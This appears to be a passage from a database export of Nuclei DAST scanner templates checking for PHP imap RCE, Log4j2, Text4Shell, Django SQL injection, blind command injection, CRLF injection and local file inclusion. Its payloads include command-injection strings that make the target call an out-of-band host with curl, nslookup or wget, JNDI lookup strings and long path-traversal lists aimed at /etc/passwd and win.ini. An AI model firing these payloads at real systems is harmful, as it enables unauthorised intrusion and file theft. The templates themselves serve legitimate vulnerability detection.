'whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100a27777a032bc8fb0a3e2a867285d0cd42cd9f86a049322603e8f04b572b5a4590221008ea1c8c84f81b54c9bba8885838fd47102d59fc32bf2018094b21e85e2b28e7b:922c64590222798bb761d5b6d8e72950", "hash": "04275c26c3aaa0515fa31176ab479625", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c7c" }, "name": "CVE-2018-19518.yaml", "content": "id: CVE-2018-19518\n\ninfo:\n name: PHP imap - Remote Command Execution\n author: princechaddha\n severity: high\n description: |\n University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a \"-oProxyCommand\" argument.\n reference:\n - https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518\n - https://nvd.nist.gov/vuln/detail/CVE-2018-19518\n - https://www.openwall.com/lists/oss-security/2018/11/22/3\n - https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.5\n cve-id: CVE-2018-19518\n cwe-id: CWE-88\n metadata:\n confidence: tenative\n tags: imap,dast,vulhub,cve,cve2018,rce,oast,php\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n php-imap:\n - \"x -oProxyCommand=echo {{base64(url_encode('curl {{interactsh-url}}'))}}|base64 -d|sh}\"\n\n fuzzing:\n - part: query\n fuzz:\n - \"{{php-imap}}\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - http\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: curl\"\n# digest: 4a0a00473045022100af7a090c8826b8f7eb0934a5a130dc05780441afce33b5e31dda44213d47691e02205499f8bad4923cabbddd841491363890751a97b823905e848b6ed457c4d2ecab:922c64590222798bb761d5b6d8e72950", "hash": "f57665e6a73beb5ee5ddba399602650e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c7d" }, "name": "CVE-2021-45046.yaml", "content": "id: CVE-2021-45046-DAST\n\ninfo:\n name: Apache Log4j2 - Remote Code Injection\n author: princechaddha\n severity: critical\n description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.\n reference:\n - https://securitylab.github.com/advisories/GHSL-2021-1054_GHSL-2021-1055_log4j2/\n - https://twitter.com/marcioalm/status/1471740771581652995\n - https://logging.apache.org/log4j/2.x/\n - http://www.openwall.com/lists/oss-security/2021/12/14/4\n - https://nvd.nist.gov/vuln/detail/CVE-2021-44228\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 9\n cve-id: CVE-2021-45046\n cwe-id: CWE-502\n metadata:\n confidence: tenative\n tags: cve,cve2021,rce,oast,log4j,injection,dast\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n log4j:\n - \"${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}}\"\n\n fuzzing:\n - part: query\n fuzz:\n - \"{{log4j}}\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the DNS Interaction\n words:\n - \"dns\"\n\n - type: regex\n part: interactsh_request\n regex:\n - '([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+' # Print extracted ${hostName} in output\n\n extractors:\n - type: regex\n part: interactsh_request\n group: 2\n regex:\n - '([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+' # Print injection point in output\n\n - type: regex\n part: interactsh_request\n group: 1\n regex:\n - '([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+' # Print extracted ${hostName} in output\n# digest: 4a0a00473045022036888452035d1bfa69cbc32805393a712fdcd5595224466cc327e681ba5ef5770221008096d4d19c6975ad5bd44b06d4bc1cdfd0746570cb65c17c50cf4eb2e8a7b10d:922c64590222798bb761d5b6d8e72950", "hash": "eb83c67b3d241275027574061148c8d0", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c7e" }, "name": "CVE-2022-34265.yaml", "content": "id: CVE-2022-34265\n\ninfo:\n name: Django - SQL injection\n author: princechaddha\n severity: critical\n description: |\n An issue was discovered in Django 3.2 before 3.2.14 and 4.0 before 4.0.6. The Trunc() and Extract() database functions are subject to SQL injection if untrusted data is used as a kind/lookup_name value. Applications that constrain the lookup name and kind choice to a known safe list are unaffected.\n reference:\n - https://github.com/vulhub/vulhub/tree/master/django/CVE-2022-34265\n - https://nvd.nist.gov/vuln/detail/CVE-2022-34265\n - https://www.djangoproject.com/weblog/2022/jul/04/security-releases/\n - https://docs.djangoproject.com/en/4.0/releases/security/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-34265\n cwe-id: CWE-89\n tags: sqli,dast,vulhub,cve,cve2022,django\n\nvariables:\n rand_string: '{{rand_text_alpha(15, \"abc\")}}'\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n fuzzing:\n - part: query\n fuzz:\n - \"test'{{rand_string}}\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'syntax error at or near "{{rand_string}}"'\n - 'LINE 1: SELECT DATE_TRUNC'\n condition: and\n\n - type: status\n status:\n - 500\n# digest: 4a0a00473045022100991d4f9cc916935beb1ad69688feda3753f72a2ab38d08917c1e133380434c010220783ace6ba00da5d1932b3362ce58cec8541b97e0058c709b6c99ff14f9cdaba8:922c64590222798bb761d5b6d8e72950", "hash": "1c97bf516a1feae926c7d92e6e915d1d", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c7f" }, "name": "CVE-2022-42889.yaml", "content": "id: CVE-2022-42889\n\ninfo:\n name: Text4Shell - Remote Code Execution\n author: mordavid,princechaddha\n severity: critical\n description: |\n Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is \"${prefix:name}\", where \"prefix\" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - \"script\" - execute expressions using the JVM script execution engine (javax.script) - \"dns\" - resolve dns records - \"url\" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.\n reference:\n - https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om\n - http://www.openwall.com/lists/oss-security/2022/10/13/4\n - http://www.openwall.com/lists/oss-security/2022/10/18/1\n - https://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text/\n - https://github.com/silentsignal/burp-text4shell\n remediation: Upgrade to Apache Commons Text component between 1.5.0 to 1.10.0.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-42889\n cwe-id: CWE-94\n metadata:\n confidence: tenative\n tags: cve,cve2022,rce,oast,text4shell,dast\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n text4shell:\n - \"${url:UTF-8:https://{{Hostname}}.q.{{interactsh-url}}}\"\n\n fuzzing:\n - part: query\n fuzz:\n - \"{{text4shell}}\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the DNS Interaction\n words:\n - \"dns\"\n\n - type: regex\n part: interactsh_request\n regex:\n - '([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+' # Print extracted ${hostName} in output\n\n extractors:\n - type: kval\n kval:\n - interactsh_ip # Print remote interaction IP in output\n\n - type: regex\n part: interactsh_request\n group: 2\n regex:\n - '([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+' # Print injection point in output\n\n - type: regex\n part: interactsh_request\n group: 1\n regex:\n - '([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+' # Print extracted ${hostName} in output\n# digest: 4a0a00473045022100adec8de25b518a2bc2dec461a62f19c384ddac2951bd98b9ec21df05061c84d9022013f544b276c203c4846921eddf8c0be1a997fd68f5d3c8b8ff71f02873788aed:922c64590222798bb761d5b6d8e72950", "hash": "dd8f3db1b13736a5f81f98279c1a1da1", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c80" }, "name": "blind-oast-polyglots.yaml", "content": "id: cmdi-blind-oast-polyglot\n\ninfo:\n name: Blind OS Command Injection\n author: pdteam,geeknik\n severity: high\n description: |\n Potential blind OS command injection vulnerabilities, where the application constructs OS commands using unsanitized user input.\n Successful exploitation could lead to arbitrary command execution on the system.\n reference:\n - https://portswigger.net/research/hunting-asynchronous-vulnerabilities\n - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Command%20Injection/README.md\n tags: cmdi,oast,dast,blind,polyglot\n\nvariables:\n marker: \"{{interactsh-url}}\"\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n payload:\n - \"&nslookup {{marker}}&'\\\\\\\"`0&nslookup {{marker}}&`'\"\n - \"1;nslookup${IFS}{{marker}};#${IFS}';nslookup${IFS}{{marker}};#${IFS}\\\";nslookup${IFS}{{marker}};#${IFS}\"\n - \"/*$(nslookup {{marker}})`nslookup {{marker}}``*/-nslookup({{marker}})-'/*$(nslookup {{marker}})`nslookup {{marker}}` #*/-nslookup({{marker}})||'\\\"||nslookup({{marker}})||\\\"/*`*/\"\n - \"$(ping -c 1 {{marker}} | nslookup {{marker}} ; wget {{marker}} -O /dev/null)\"\n\n fuzzing:\n - part: query\n type: postfix\n fuzz:\n - \"{{payload}}\"\n\n stop-at-first-match: true\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n# digest: 490a00463044022058dacdd25a0687edf873bcfed32eb383e77deb0e9ea9673e111501121429df2702202005d54354bf6a06cd873145dea3139f0b094a3baad9e7313fd9d65ef7b31876:922c64590222798bb761d5b6d8e72950", "hash": "3a3605c633a724ad016d9380d3a854d4", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c81" }, "name": "ruby-open-rce.yaml", "content": "id: cmdi-ruby-open-rce\n\ninfo:\n name: Ruby Kernel#open/URI.open RCE\n author: pdteam\n severity: high\n description: |\n Ruby's Kernel#open and URI.open enables not only file access but also process invocation by prefixing a pipe symbol (e.g., open(“| ls”)). So, it may lead to Remote Code Execution by using variable input to the argument of Kernel#open and URI.open.\n reference:\n - https://bishopfox.com/blog/ruby-vulnerabilities-exploits\n - https://codeql.github.com/codeql-query-help/ruby/rb-kernel-open/\n tags: cmdi,oast,dast,blind,ruby,rce\n\nvariables:\n marker: \"{{interactsh-url}}\"\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n stop-at-first-match: true\n payloads:\n interaction:\n - \"|nslookup {{marker}}|curl {{marker}}\"\n\n fuzzing:\n - part: query\n fuzz:\n - \"{{interaction}}\"\n\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n# digest: 490a0046304402206aa8aaaae832c775eb192a6fa98138271fa21bc2ac34b3881f0e06d24fb48f78022040513ba5b73cbfb5fe42c3a312ae9d8e76fb0d6f942ad7bcfe8dfff4f173d00c:922c64590222798bb761d5b6d8e72950", "hash": "fa13fa98bae4cf75af71c4eb712968f4", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c82" }, "name": "cookie-injection.yaml", "content": "id: cookie-injection\n\ninfo:\n name: Parameter based cookie injection\n author: pdteam\n severity: info\n reference:\n - https://www.invicti.com/blog/web-security/understanding-cookie-poisoning-attacks/\n - https://docs.imperva.com/bundle/on-premises-knowledgebase-reference-guide/page/cookie_injection.htm\n tags: reflected,dast,cookie,injection\n\nvariables:\n first: \"cookie_injection\"\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n reflection:\n - \"{{first}}\"\n\n fuzzing:\n - part: query\n type: postfix\n fuzz:\n - \"{{reflection}}\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)(?i)(^set-cookie.*cookie_injection.*)'\n# digest: 4a0a00473045022100af6e35a8b4c4d4533e339e81393faed157da2e68144557ca3fe73fb16178919c022073127c1b729ab0c8c273cbc022b2aca2b7a91a6c4c314633a20059e6b10e22ed:922c64590222798bb761d5b6d8e72950", "hash": "6c78d16674d57506fe68ec69607267f0", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c83" }, "name": "crlf-injection.yaml", "content": "id: crlf-injection\n\ninfo:\n name: CRLF Injection\n author: pdteam\n severity: low\n tags: crlf,dast\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n escape:\n - \"%00\"\n - \"%0a\"\n - \"%0a%20\"\n - \"%0d\"\n - \"%0d%09\"\n - \"%0d%0a\"\n - \"%0d%0a%09\"\n - \"%0d%0a%20\"\n - \"%0d%20\"\n - \"%20\"\n - \"%20%0a\"\n - \"%20%0d\"\n - \"%20%0d%0a\"\n - \"%23%0a\"\n - \"%23%0a%20\"\n - \"%23%0d\"\n - \"%23%0d%0a\"\n - \"%23%oa\"\n - \"%25%30\"\n - \"%25%30%61\"\n - \"%2e%2e%2f%0d%0a\"\n - \"%2f%2e%2e%0d%0a\"\n - \"%2f..%0d%0a\"\n - \"%3f\"\n - \"%3f%0a\"\n - \"%3f%0d\"\n - \"%3f%0d%0a\"\n - \"%e5%98%8a%e5%98%8d\"\n - \"%e5%98%8a%e5%98%8d%0a\"\n - \"%e5%98%8a%e5%98%8d%0d\"\n - \"%e5%98%8a%e5%98%8d%0d%0a\"\n - \"%e5%98%8a%e5%98%8d%e5%98%8a%e5%98%8d\"\n - \"%u0000\"\n - \"%u000a\"\n - \"%u000d\"\n - \"\\r\"\n - \"\\r%20\"\n - \"\\r\\n\"\n - \"\\r\\n%20\"\n - \"\\r\\n\\t\"\n - \"\\r\\t\"\n\n fuzzing:\n - part: query\n type: postfix\n fuzz:\n - \"{{escape}}Set-Cookie:crlfinjection=crlfinjection\"\n\n stop-at-first-match: true\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Set-Cookie\\s*?:(?:\\s*?|.*?;\\s*?))(crlfinjection=crlfinjection)(?:\\s*?)(?:$|;)'\n# digest: 4b0a00483046022100cb88bef820fa9247bc7ddc126d8bb67c4d2371c0b4a33f64b4caa5360007f1750221009ea9e7de7dc5fe7e75cf9d215a9c2d9e3323f2caa40b7c4b39cf214f661cce48:922c64590222798bb761d5b6d8e72950", "hash": "3f73b53267914574a8a5fb04555408f6", "level": 3, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c84" }, "name": "angular-client-side-template-injection.yaml", "content": "id: angular-client-side-template-injection\n\ninfo:\n name: Angular Client-side-template-injection\n author: theamanrawat\n severity: high\n description: |\n Detects Angular client-side template injection vulnerability.\n impact: |\n May lead to remote code execution or sensitive data exposure.\n remediation: |\n Sanitize user inputs and avoid using user-controlled data in template rendering.\n reference:\n - https://www.acunetix.com/vulnerabilities/web/angularjs-client-side-template-injection/\n - https://portswigger.net/research/xss-without-html-client-side-template-injection-with-angularjs\n tags: angular,csti,dast,headless,xss\n\nvariables:\n first: \"{{rand_int(1000, 9999)}}\"\n second: \"{{rand_int(1000, 9999)}}\"\n result: \"{{to_number(first)*to_number(second)}}\"\n\nheadless:\n - steps:\n - action: navigate\n args:\n url: \"{{BaseURL}}\"\n\n - action: waitload\n\n payloads:\n payload:\n - '{{concat(\"{{\", \"{{first}}*{{second}}\", \"}}\")}}'\n\n fuzzing:\n - part: query\n type: postfix\n mode: single\n fuzz:\n - \"{{payload}}\"\n\n matchers:\n - type: word\n part: body\n words:\n - \"{{result}}\"\n# digest: 4a0a00473045022100adfe788d650a997bddf7f4876f1308a9d1ea62d43e7b90abca139f455492d4e902203223d59aac1aa4374770127adface5ccebfd4a4dc8fdfef8b240578bf7b6df72:922c64590222798bb761d5b6d8e72950", "hash": "0a9215588b189abfdbe8bbb570f810c9", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c85" }, "name": "lfi-keyed.yaml", "content": "id: lfi-keyed\n\ninfo:\n name: LFI Detection - Keyed\n author: pwnhxl\n severity: unknown\n reference:\n - https://owasp.org/www-community/attacks/Unicode_Encoding\n tags: dast,pathtraversal,lfi\n\nvariables:\n fuzz: \"../../../../../../../../../../../../../../../\"\n fuzz_urlx2_encode: \"%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f\"\n fuzz_hex_unicode: \"%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f\"\n fuzz_utf8_unicode: \"%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF\"\n fuzz_utf8_unicode_x: \"%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF\"\n fuzz_bypass_replace: \".../.../.../.../.../.../.../.../.../.../.../.../.../.../.../\"\n fuzz_bypass_replace_windows: '..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\'\n fuzz_bypass_waf_regx: \"./.././.././.././.././.././.././.././.././.././.././.././.././.././.././../\"\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n pathtraversal:\n - '{{fuzz}}etc/passwd'\n - '{{fuzz}}windows/win.ini'\n - '/etc/passwd%00.jpg'\n - 'c:/windows/win.ini%00.jpg'\n - '{{fuzz}}etc/passwd%00.jpg'\n - '{{fuzz}}windows/win.ini%00.jpg'\n - '{{fuzz_urlx2_encode}}etc%252fpasswd'\n - '{{fuzz_urlx2_encode}}windows%252fwin.ini'\n - '{{fuzz_hex_unicode}}etc%u002fpasswd'\n - '{{fuzz_hex_unicode}}windows%u002fwin.ini'\n - '{{fuzz_utf8_unicode}}etc%C0%AFpasswd'\n - '{{fuzz_utf8_unicode}}windows%C0%AFwin.ini'\n - '{{fuzz_utf8_unicode_x}}etc%C0AFpasswd'\n - '{{fuzz_utf8_unicode_x}}windows%C0AFwin.ini'\n - '{{fuzz_bypass_replace}}etc/passwd'\n - '{{fuzz_bypass_replace}}windows/win.ini'\n - '{{fuzz_bypass_replace_windows}}windows\\win.ini'\n - '{{fuzz_bypass_waf_regx}}etc/passwd'\n - '{{fuzz_bypass_waf_regx}}windows/win.ini'\n - './web.config'\n - '../web.config'\n - '../../web.config'\n - './WEB-INF/web.xml'\n - '../WEB-INF/web.xml'\n - '../../WEB-INF/web.xml'\n\n fuzzing:\n - part: query\n mode: single\n keys:\n - cat\n - dir\n - action\n - board\n - date\n - detail\n - file\n - download\n - path\n - folder\n - prefix\n - include\n - page\n - inc\n - locate\n - show\n - doc\n - site\n - type\n - view\n - content\n - document\n - layout\n - mod\n - conf\n - url\n - img\n - image\n - images\n fuzz:\n - \"{{pathtraversal}}\"\n\n - part: query\n mode: single\n values:\n - \"^(./|../|/)|(.html|.htm|.xml|.conf|.cfg|.log|.txt|.pdf|.doc|.docx|.xls|.csv|.png|.jpg|.gif)$\"\n fuzz:\n - \"{{pathtraversal}}\"\n\n stop-at-first-match: true\n matchers-condition: or\n matchers:\n - type: regex\n part: body\n regex:\n - 'root:.*?:[0-9]*:[0-9]*:'\n\n - type: word\n part: body\n words:\n - 'for 16-bit app support'\n\n - type: regex\n part: body\n regex:\n - '()'\n\n - type: regex\n part: body\n regex:\n - '()'\n# digest: 4b0a004830460221008cfcfdf2c3bffd887bfe964b433efe76af72df0f94ecea20ec1917cd00641c0f022100874e6ff747dbd4fa96124d034a126534558b56a7c317b32525e3d08199409065:922c64590222798bb761d5b6d8e72950", "hash": "1af68417309804739b38b836d2075162", "level": 1, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c86" }, "name": "linux-lfi-fuzz.yaml", "content": "id: linux-lfi-fuzz\n\ninfo:\n name: Local File Inclusion - Linux\n author: DhiyaneshDK\n severity: high\n reference:\n - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/directory_traversal.txt\n - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion\n tags: lfi,dast,linux\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n nix_fuzz:\n - '/etc/passwd'\n - '../../etc/passwd'\n - '../../../etc/passwd'\n - '/../../../../etc/passwd'\n - '../../../../../../../../../etc/passwd'\n - '../../../../../../../../etc/passwd'\n - '../../../../../../../etc/passwd'\n - '../../../../../../etc/passwd'\n - '../../../../../etc/passwd'\n - '../../../../etc/passwd'\n - '../../../etc/passwd'\n - '../../../etc/passwd%00'\n - '../../../../../../../../../../../../etc/passwd%00'\n - '../../../../../../../../../../../../etc/passwd'\n - '/../../../../../../../../../../etc/passwd^^'\n - '/../../../../../../../../../../etc/passwd'\n - '/./././././././././././etc/passwd'\n - '\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd'\n - '..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd'\n - '/..\\../..\\../..\\../..\\../..\\../..\\../etc/passwd'\n - '.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./etc/passwd'\n - '\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd%00'\n - '..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd%00'\n - '%252e%252e%252fetc%252fpasswd'\n - '%252e%252e%252fetc%252fpasswd%00'\n - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'\n - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00'\n - '....//....//etc/passwd'\n - '..///////..////..//////etc/passwd'\n - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd'\n - '%0a/bin/cat%20/etc/passwd'\n - '%00/etc/passwd%00'\n - '%00../../../../../../etc/passwd'\n - '/../../../../../../../../../../../etc/passwd%00.jpg'\n - '/../../../../../../../../../../../etc/passwd%00.html'\n - '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd'\n - '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'\n - '\\\\'/bin/cat%20/etc/passwd\\\\''\n - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'\n - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'\n - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'\n - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'\n - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'\n - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'\n - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'\n - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'\n\n fuzzing:\n - part: query\n type: replace # replaces existing parameter value with fuzz payload\n mode: multiple # replaces all parameters value with fuzz payload\n fuzz:\n - '{{nix_fuzz}}'\n\n stop-at-first-match: true\n matchers:\n - type: regex\n part: body\n regex:\n - 'root:.*:0:0:'\n# digest: 4b0a00483046022100a1e70a22bc4f17a046a9b366a9015608da82f88439ab75d052b64088a7009da8022100e29c115d86b47951f1da2fb56d7953ec1e59e93d86b70d24d34ad8c14ad3064d:922c64590222798bb761d5b6d8e72950", "hash": "42bba0ab180a51442dfb6ecee1173908", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c87" }, "name": "windows-lfi-fuzz.yaml", "content": "id: windows-lfi-fuzz\n\ninfo:\n name: Local File Inclusion - Windows\n author: pussycat0x\n severity: high\n tags: lfi,windows,dast\n\nhttp:\n - pre-condition:\n - type: dsl\n dsl:\n - 'method == \"GET\"'\n\n payloads:\n win_fuzz:\n - '\\WINDOWS\\win.ini'\n - '\\WINDOWS\\win.ini'\n - '\\WINDOWS\\win.ini%00'\n - '\\WINNT\\win.ini'\n - '\\WINNT\\win.ini%00'\n - 'windows/win.ini%00'\n - '../../windows/win.ini'\n - '....//....//windows/win.ini'\n - '/../../../../../../../../../../../../../../../../&location=Windows/win.ini'\n - '../../../../../windows/win.ini'\n - '/..///////..////..//////windows/win.ini'\n - '/../../../../../../../../../windows/win.ini'\n - './../../../../../../../../../../windows/win.ini'\n - '/...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini'\n - '/.../.../.../.../.../.../.../.../.../windows/win.ini'\n - '/..../..../..../..../..../..../..../..../..../windows/win.ini'\n - '/....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini'\n - '\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\Windows\\\\\\\\win.ini'\n - '/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini'\n - '..%2f..%2f..%2f..%2fwindows/win.ini'\n - '..%2f..%2f..%2f..%2f..%2fwindows/win.ini'\n - '..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'\n - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'\n - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00'\n - '..%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini'\n - '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'\n - '/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini'\n - '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini'\n - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini'\n - '/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini'\n - '/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'\n - 